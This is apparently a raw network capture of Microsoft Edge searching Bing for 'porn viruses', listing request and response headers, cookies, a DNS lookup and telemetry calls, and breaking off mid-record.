Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUID=V=2&GUID=AD42878331204FD2ACCDDC66D1623B05&dmnchg=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUSR=DOB=20241005; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:22 GMT; path=/; secure; SameSite=None
Set-Cookie: _SS=SID=03530C3245C362FF1C1B193D440A63AC; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.ac777b5c.1728144322.695f1e9
GET

https://www.bing.com/qbox?query=porn+virus&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=ef1e86cbd2c34afd9830e29f26b52d47&oit=4&cp=10&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=porn+virus&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=ef1e86cbd2c34afd9830e29f26b52d47&oit=4&cp=10&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 139
Content-Type: application/json; charset=utf-8
Cache-Control: public, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163c39f4d41caafc87106c3fe6f07
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-5T1xSE6iUxQ3oAPzVrHmtR/k3mX7Xz+QliDNXV4in7Q='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:23 GMT
Connection: keep-alive
Set-Cookie: MUID=38F34E6B743F67F102385B6475746694; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:23 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=38F34E6B743F67F102385B6475746694; expires=Thu, 30-Oct-2025 16:05:23 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=086A5D88E98D6C270F6C4887E8C66DF9; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:23 GMT; path=/; HttpOnly
Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:23 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: SRCHD=AF=NOFORM; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:23 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUID=V=2&GUID=4A666A3E3D86486A9027D93CECD37486&dmnchg=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:23 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUSR=DOB=20241005; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:23 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:23 GMT; path=/; secure; SameSite=None
Set-Cookie: _SS=SID=086A5D88E98D6C270F6C4887E8C66DF9; domain=.bing.com; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.ac777b5c.1728144323.695f6b9
GET

https://www.bing.com/qbox?query=porn+viruse&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=d2a090ad2ac740ef865b0bc018698c70&oit=4&cp=11&pgcl=4

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /qbox?query=porn+viruse&language=en-US&pt=EdgBox&cvid=b918b912aea0447dac6c3f982135f63c&ig=d2a090ad2ac740ef865b0bc018698c70&oit=4&cp=11&pgcl=4 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
DNS

189.128.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

189.128.123.92.in-addr.arpa

IN PTR

Response

189.128.123.92.in-addr.arpa

IN PTR

a92-123-128-189deploystaticakamaitechnologiescom
GET

https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=0
Content-Encoding: br
Expires: Sat, 05 Oct 2024 16:04:25 GMT
Vary: Accept-Encoding
X-EventID: 670163c530fd47b881461133ee19e33f
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-UU+HCPakUXUQbz/VovrudVJmp1ELbwG1AhkjYH2PNrI='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp&ndcParam=QWthbWFp"}]}
Report-To: {"group":"crossorigin-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0,"include_subdomains":true}
Cross-Origin-Embedder-Policy-Report-Only: 'require-corp; report-to=\"crossorigin-errors\"'
Cross-Origin-Opener-Policy-Report-Only: 'same-origin; report-to=\"crossorigin-errors\"'
Date: Sat, 05 Oct 2024 16:05:25 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:25 GMT; path=/; secure; SameSite=None
Set-Cookie: MUIDB=05879ADD3EF86D540F588FD23FDB6C78; expires=Thu, 30-Oct-2025 16:05:25 GMT; path=/; HttpOnly
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; domain=.bing.com; path=/; HttpOnly
Set-Cookie: _EDGE_V=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:25 GMT; path=/; HttpOnly
Set-Cookie: USRLOC=HS=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:25 GMT; path=/; secure; HttpOnly; SameSite=None
Set-Cookie: _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; domain=.bing.com; path=/; secure; SameSite=None
Set-Cookie: SRCHS=PC=U531; domain=.bing.com; path=/; secure; SameSite=None
Set-Cookie: SRCHD=AF=ANAB01; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:25 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:25 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHUSR=DOB=20241005; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:25 GMT; path=/; secure; SameSite=None
Set-Cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:25 GMT; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144325.184e5fc8
Set-Cookie: ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; Domain=.bing.com; Path=/; Expires=Sat, 05 Oct 2024 18:05:25 GMT; Max-Age=7200
GET

https://www.bing.com/sa/simg/Roboto_Semibold.woff2

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /sa/simg/Roboto_Semibold.woff2 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
DNT: 1
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 15436
Content-Type: font/woff2
Cache-Control: public, max-age=15552000
Last-Modified: Mon, 01 Jan 1601 00:00:00 GMT
X-EventID: 661b7fb4a5a64a25bfe52f31cdb238a2
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy-Report-Only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-Dc7XB6hZwYD7vh6hxGugqMXoa2v2PSgRTnvZk3RerSA='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Date: Sat, 05 Oct 2024 16:05:26 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144326.184e61b7
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:4057,%22BC%22:4057,%22SE%22:-1,%22TC%22:-1,%22H%22:4151,%22BP%22:4439,%22CT%22:4440,%22IL%22:1},%22ad%22:[-1,-1,1263,609,1263,498,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:4057,%22BC%22:4057,%22SE%22:-1,%22TC%22:-1,%22H%22:4151,%22BP%22:4439,%22CT%22:4440,%22IL%22:1},%22ad%22:[-1,-1,1263,609,1263,498,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHHPGUSR=SRCHLANG=en&HV=1728144330

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144330.184e6378
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144329942%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22250%22%2C%22Downlink%22%3A%2210%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1728144329942%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1728144329942%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22250%22%2C%22Downlink%22%3A%2210%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1728144329942%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1728144331917%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHHPGUSR=SRCHLANG=en&HV=1728144330&DM=0

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144332.184e866c
GET

https://www.bing.com/images/sbi?mmasync=1&ig=0DD30F05AB304142B388EAD39E0E9879&iid=.5092&ptn=Web&ep=0&iconpl=1

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /images/sbi?mmasync=1&ig=0DD30F05AB304142B388EAD39E0E9879&iid=.5092&ptn=Web&ep=0&iconpl=1 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHHPGUSR=SRCHLANG=en&HV=1728144330&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0

Response

HTTP/1.1 200 OK

Content-Length: 3285
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163cc1e5c47d5a2697313455bff4a
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Pw+jdI/spWMEq8n2um4cj2JcUvrj/gC5FpvaTS5afhc='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Set-Cookie: SRCHHPGUSR=SRCHLANG=en&HV=1728144330&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; domain=.bing.com; expires=Thu, 30-Oct-2025 16:05:32 GMT; path=/; secure; SameSite=None
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bd777b5c.1728144332.184e933d
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144332051%2C%22Name%22%3A%22block%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

